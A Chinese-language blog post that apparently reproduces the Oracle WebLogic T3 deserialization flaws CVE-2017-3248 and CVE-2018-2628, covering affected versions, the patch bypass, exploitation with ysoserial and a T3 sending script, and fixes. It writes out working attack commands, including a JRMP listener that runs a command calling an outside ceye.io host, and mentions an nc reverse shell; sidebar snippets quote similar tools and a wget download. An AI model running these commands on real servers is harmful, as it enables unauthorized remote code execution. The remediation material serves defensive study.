CVE-2017-3248&CVE-2018-2628

最新推荐文章于 2024-07-16 16:26:41 发布
最新推荐文章于 2024-07-16 16:26:41 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: Web安全 文章标签: cve-2017-3248 cve-2018-2628
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/he_and/article/details/90580999
版权

CVE-2017-3248

漏洞利用前提
  • 影响版本
    WebLogic 10.3.6.0
    WebLogic 12.1.3.0
    WebLogic 12.2.1.0
    WebLogic 12.2.1.1
原理简析

这个漏洞的产生是因为绕过了cve-2015-4852的补丁,该补丁中采用黑名单的方式过滤危险的反序列化类,但是这种修复方式很被动,存在被绕过的风险,只要发现可用并且未在黑名单之外的反序列化类,那么之前的防护就会被打破,系统遭受攻击

漏洞利用方法

与cve-2018-2628一致,因为cve-2018-2628就是绕过了cve-2017-3248的补丁而已,所以CVE-2018-2628可以利用的payload同样可以应用于本漏洞

修复方案

参考CVE-2018-2628

痕迹分析

同CVE-2018-2628

CVE-2018-2628

漏洞利用前提

  • 版本
    Oracle WebLogic Server10.3.6.0
    Oracle WebLogic Server12.2.1.2
    Oracle WebLogic Server12.2.1.3
    Oracle WebLogic Server12.1.3.0

  • 配置
    开启T3协议(默认为开启状态)

原理简析

这个洞产生原因是 weblogic 对于 T3 协议发送的数据包没有过滤,攻击者通过T3协议发送一段序列化后的恶意数据,这段数据经过weblogic反序列后生成的对象会请求攻击者的rmi服务端,加载恶意数据,再反序列化生成一个对象,利用反射机制导致命令执行。

说到这个漏洞就不得不提CVE-2017-3248,因为这个漏洞是绕过CVE-2017-3248的补丁而产生的,我们先来看看3248的补丁做了什么
在这里插入图片描述由上图可见,补丁采用黑名单的方式在weblogic.rjvm.InboundMsgAbbrev$ServerChannelInputStream.class多了一个resolveProxyClass,这个resolveProxyClass只是对 RMI 接口类型进行了判断,判断 RMI 接口是否为java.rmi.registry.Registry,是的话抛出错误。

绕过思路很简单,找另外一个可利用的RMI接口,这里使用java.rmi.activation.Activator来生成payload

漏洞利用方法

我们使用著名的ysoserial工具来进行复现

生成payload

java -jar /opt/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar payload 攻击者服务器ip:攻击者服务器监听的端口 > payload写入的文件

例:生成的payload写入文件axin
java -jar /opt/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar JRMPClient2 127.0.0.1:1099 > axin

注意:这里使用的是JRMPClient2,这个版本是使用的java.rmi.activation.Activator来生成payload,除此之外ysoserial中还有一个JRMPClient,这个版本则是使用的java.rmi.registry.Registry生成payload

攻击者服务器上进行监听

java -cp ysoserial-0.6-SNAPSHOT-BETA-all.jar exploit 监听端口 使用的类 需要执行的命令

例:java -cp ysoserial-0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "ping 123333.3w9vbg.ceye.io"

发送payload到目标主机

这里需要用到一个利用T3协议发送数据的脚本
python weblogic.py 目标主机 目标端口 payload文件

例:python weblogic.py 127.0.0.1 7001 axin
如果利用成功可以在ceye.io平台上看到相应的DNS解析记录,这也就说明了命令成功执行了。
监听端,收到来自目标机的请求
在这里插入图片描述
ceye平台有相应dns解析记录
在这里插入图片描述
至此漏洞复现完成,当然还可以尝试执行其他命令,例如在特定场景下利用nc反弹一个shell等

修复方案
  • 打补丁
  • 禁用T3协议
    在这里插入图片描述连接筛选器填:weblogic.security.net.ConnectionFilterImpl
    筛选规则填取:* * 7001 deny t3 t3s (根据需要修改)
    重启生效。
痕迹分析

该漏洞直接利用t3协议触发,在日志中不会有记录,所以很难排查痕迹

在这里插入图片描述

tnt阿信
关注
专栏目录
【Vulfocus】weblogic 远程代码执行(CVE-2018-3245)漏洞复现
JavaLord123的博客
09-25 500
本文详细描述了Vulfocus靶场中weblogic远程代码执行(CVE-2018-3245)漏洞复现过程
weblogicT3反序列化之CVE-2017-3248&CVE-2018-2628&CVE-2018-3245
weixin_45682070的博客
03-13 5865
前言 上上篇文章我们分析了CVE-2015-4852、CVE-2016-0638、CVE-2016-3510的漏洞,因果是从resolveClass方法中出现的,resolveClass方法直接继承了父类的方法,然后没有任何过滤的造成了序列化漏洞,后面两个cve都是前者的绕过。今天分析一下CVE-2017-3248 & CVE-2018-2628,上上文中我们知道readClassDesc类描述方法可分为没有代理的类和代理类,CVE-2017-3248漏洞的成因就是代理类resolveProxyCl
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H (执行主机)Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os (操作系统类型)Os Type [windows,linux] -P (远程端口)Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file
CVE-2017-3248简单复现
ddr12231的博客
09-17 896
我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt" linux虚拟机上执行 python exploit-C...
WebLogic_CVE-2017-3248&&GetShell-CMD验证工具.rar
02-11
Weblogic任意命令执行的检测工具。 WebLogic_CVE-2017-3248文件夹的执行命令: java -jar weblogic_cmd.jar -C whoami -H 10.1.1.104 -P 8083 Weblogic Unserialization GetShll&CMD文件夹的执行命令: java -jar Weblogic-Unserialization-GetShll-CMD.jar 或者双击starter.bat.
CVE-2017-3248——WebLogic反序列化漏洞利用工具
weixin_30628801的博客
07-20 891
著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险,用户更新补丁后,仍然存在被绕过成功执行远程命令攻击的情况,安全风险高,Oracle官方及时发布了最新补丁,修复了该漏洞,阿里云安全团队建议用户尽快自查并升级。 具体详情如下: 漏洞编号: CVE-2017-3248 漏洞名称: WebLogic 反序列化漏洞 官方评级: 高危 漏洞描述: Or...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
CVE-2018-2628补丁安装手册
07-24
### CVE-2018-2628补丁安装手册关键知识点 #### 一、概述 CVE-2018-2628是一种针对WebLogic服务器的安全漏洞,该漏洞可能允许远程攻击者在未经身份验证的情况下执行任意代码。为确保系统的安全性和稳定性,及时对受...
web反序列化漏洞原理_CVE-2017-3248——WebLogic反序列化初探_零开始网络安全技巧
最新发布
程序员六七的博客
07-16 649
安全客 - 安全资讯平台
K8 weblogic-CVE-2018-2628-getshell
05-08
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用!
Weblogic CVE-2018-2628补丁
07-09
2628前不需要打10271。如果打过10271,需要卸载掉才能打2628
cve-2018-2628 exp getshell
05-21
cve-2018-2628 exp getshell
WebLogic CVE-2018-2628漏洞
06-13
先安装CVE-2017-10271 漏洞补丁,在打 CVE-2018-2628 补丁
CVE-2018-2628
04-18 229
哈哈哈,终于等到我复现一个CVE漏洞了。漏洞描述Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。攻击者可以在未授权的情况下,通过T3协议在WebLogic Ser...
推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具
gitblog_00075的博客
06-15 460
推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在网络安全研究的浩瀚星空中,一款名为exploit-CVE-2017-3248-bobsecq.py的脚本如星辰般璀璨。它专为针对“Oracle WebLogic RMI Registry UnicastRef对象Java反序列化远程代码执...
weblogic之CVE-2017-3248CVE-2018-2628,CVE-2018-2893,CVE-2018-3245反序列绕过分析
weixin_30820151的博客
01-11 838
说一下复现CVE-2017-3248可以参考p牛的环境,p牛的环境CVE-2018-2628实际就是CVE-2017-3248,他漏洞编号这块写错了。 攻击流程就如下图,攻击者开启JRMPListener监听在1099端口,等待受害者链接,当受害者链接时,把gadgets返回给客户端: CVE-2017-3248以后的漏洞都是利用了JRMP java远程方法协议,利用java.rmi...
WebLogic反序列化漏洞(CVE-2017-3248
公众号shadow sock7
11-19 7407
参考: https://paper.seebug.org/333/ 环境安装 反弹shell参考: https://w00troot.blogspot.com/2017/05/getting-reverse-shell-from-web-shell.html weblogic在服务器命令行安装步骤参考: https://blog.csdn.net/caiqiiqi/article/details/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值